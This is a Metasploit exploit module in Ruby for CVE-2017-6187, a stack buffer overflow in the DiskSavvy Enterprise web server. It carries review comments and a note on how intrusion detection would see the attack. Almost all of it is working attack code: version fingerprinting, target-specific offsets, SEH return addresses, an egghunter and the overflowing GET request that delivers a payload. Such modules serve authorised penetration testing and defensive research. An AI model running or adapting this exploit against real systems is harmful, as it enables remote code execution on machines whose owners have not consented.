##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Seh
  include Msf::Exploit::Remote::Egghunter
  include Msf::Exploit::Remote::HttpClient

  # Module metadata: product and affected versions, references
  # (CVE-2017-6187, EDB 40869), payload constraints, and the concrete
  # targets. Targets 1 and 2 differ only in the overflow offset and the
  # SEH return address for the two affected product versions; target 0
  # selects between them at run time from the server's version banner
  # (see #exploit).
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'DiskSavvy Enterprise GET Buffer Overflow',
        'Description' => %q{
          This module exploits a stack-based buffer overflow vulnerability
          in the web interface of DiskSavvy Enterprise v9.1.14 and v9.3.14,
          caused by improper bounds checking of the request path in HTTP GET
          requests sent to the built-in web server. This module has been
          tested successfully on Windows XP SP3 and Windows 7 SP1.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'vportal', # Vulnerability discovery and PoC
          'Gabor Seljan' # Metasploit module
        ],
        'References' => [
          ['CVE', '2017-6187'],
          ['EDB', '40869']
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        'Platform' => 'win',
        'Payload' => {
          # NUL, tab, LF, CR and space may not appear in the payload —
          # presumably because the buffer travels in the request path, where
          # these bytes delimit the request line.
          'BadChars' => "\x00\x09\x0a\x0d\x20",
          'Space' => 500
        },
        'Targets' => [
          [
            'Automatic Targeting',
            {
              # Resolved to targets[1] or targets[2] by #exploit.
              'auto' => true
            }
          ],
          [
            'DiskSavvy Enterprise v9.1.14',
            {
              'Offset' => 542,
              'Ret' => 0x101142c0 # POP # POP # RET [libspp.dll]
            }
          ],
          [
            'DiskSavvy Enterprise v9.3.14',
            {
              'Offset' => 2478,
              'Ret' => 0x101142ff # POP # POP # RET [libspp.dll]
            }
          ]
        ],
        'Privileged' => true,
        'DisclosureDate' => '2016-12-01',
        'DefaultTarget' => 0,
        # Reliability, stability and side effects have not been assessed.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Non-intrusive version check: requests GET / once and maps the
  # advertised "Disk Savvy Enterprise v..." banner onto a CheckCode.
  #
  # @return [Exploit::CheckCode]
  #   Appears  - banner contains 9.1.14 or 9.3.14
  #   Detected - banner present with any other version
  #   Unknown  - no response, or a non-200 status
  #   Safe     - 200 response without a version banner
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => '/'
    )

    if res && res.code == 200
      # Banner text up to the next HTML tag; nil when not present.
      version = res.body[/Disk Savvy Enterprise v[^<]*/]
      if version
        vprint_status("Version detected: #{version}")
        # NOTE(review): unanchored, so any banner containing the substring
        # "9.1.14" or "9.3.14" is reported as Appears.
        if version =~ /9\.(1|3)\.14/
          return Exploit::CheckCode::Appears
        end

        return Exploit::CheckCode::Detected
      end
    else
      # NOTE(review): this branch also runs for any non-200 status, where the
      # "connection timeout" wording is inaccurate.
      vprint_error('Unable to determine due to a HTTP connection timeout')
      return Exploit::CheckCode::Unknown
    end

    Exploit::CheckCode::Safe
  end

  # Builds and sends the single overflowing GET request.
  #
  # With the 'Automatic Targeting' target the version banner from GET /
  # decides which concrete target (Offset + SEH return address) is used;
  # an unrecognised or missing banner aborts with Failure::NoTarget.
  #
  # From a monitoring standpoint the whole attack is one GET whose request
  # path is several thousand bytes of alphabetic filler (the target Offset
  # plus a 4500-byte trailer), which is what a web-server access log or an
  # IDS/WAF rule on request-line length would observe.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when no target matches
  def exploit
    mytarget = target

    if target['auto']
      mytarget = nil

      print_status('Automatically detecting the target...')

      res = send_request_cgi(
        'method' => 'GET',
        'uri' => '/'
      )

      if res && res.code == 200
        # Same banner as #check, but matched against the exact versions.
        if res.body =~ /Disk Savvy Enterprise v9\.1\.14/
          mytarget = targets[1]
        elsif res.body =~ /Disk Savvy Enterprise v9\.3\.14/
          mytarget = targets[2]
        end
      end

      if !mytarget
        fail_with(Failure::NoTarget, 'No matching target')
      end

      print_status("Selected target: #{mytarget.name}")
    end

    # Egghunter setup: the encoded payload is wrapped in an egg tagged with a
    # random 4-byte marker drawn from characters outside payload_badchars.
    # The checksum option is passed straight through to generate_egghunter;
    # its semantics are defined by the Egghunter mixin, not here.
    eggoptions = {
      checksum: true,
      eggtag: rand_text_alpha(4, payload_badchars)
    }

    hunter, egg = generate_egghunter(
      payload.encoded,
      payload_badchars,
      eggoptions
    )

    # Request-path layout, in order: NOP sled, egg, filler up to the
    # target-specific Offset, SEH record built from mytarget.ret, NOPs,
    # hunter stub, then a 4500-byte trailer.
    # Assumes egg.length <= mytarget['Offset']; otherwise the filler length
    # goes negative — TODO confirm how rand_text_alpha treats that.
    sploit = make_nops(10)
    sploit << egg
    sploit << rand_text_alpha(mytarget['Offset'] - egg.length)
    sploit << generate_seh_record(mytarget.ret)
    sploit << make_nops(8)
    sploit << hunter
    sploit << rand_text_alpha(4500)

    print_status('Sending malicious request...')

    send_request_cgi(
      'method' => 'GET',
      'uri' => sploit
    )
  end
end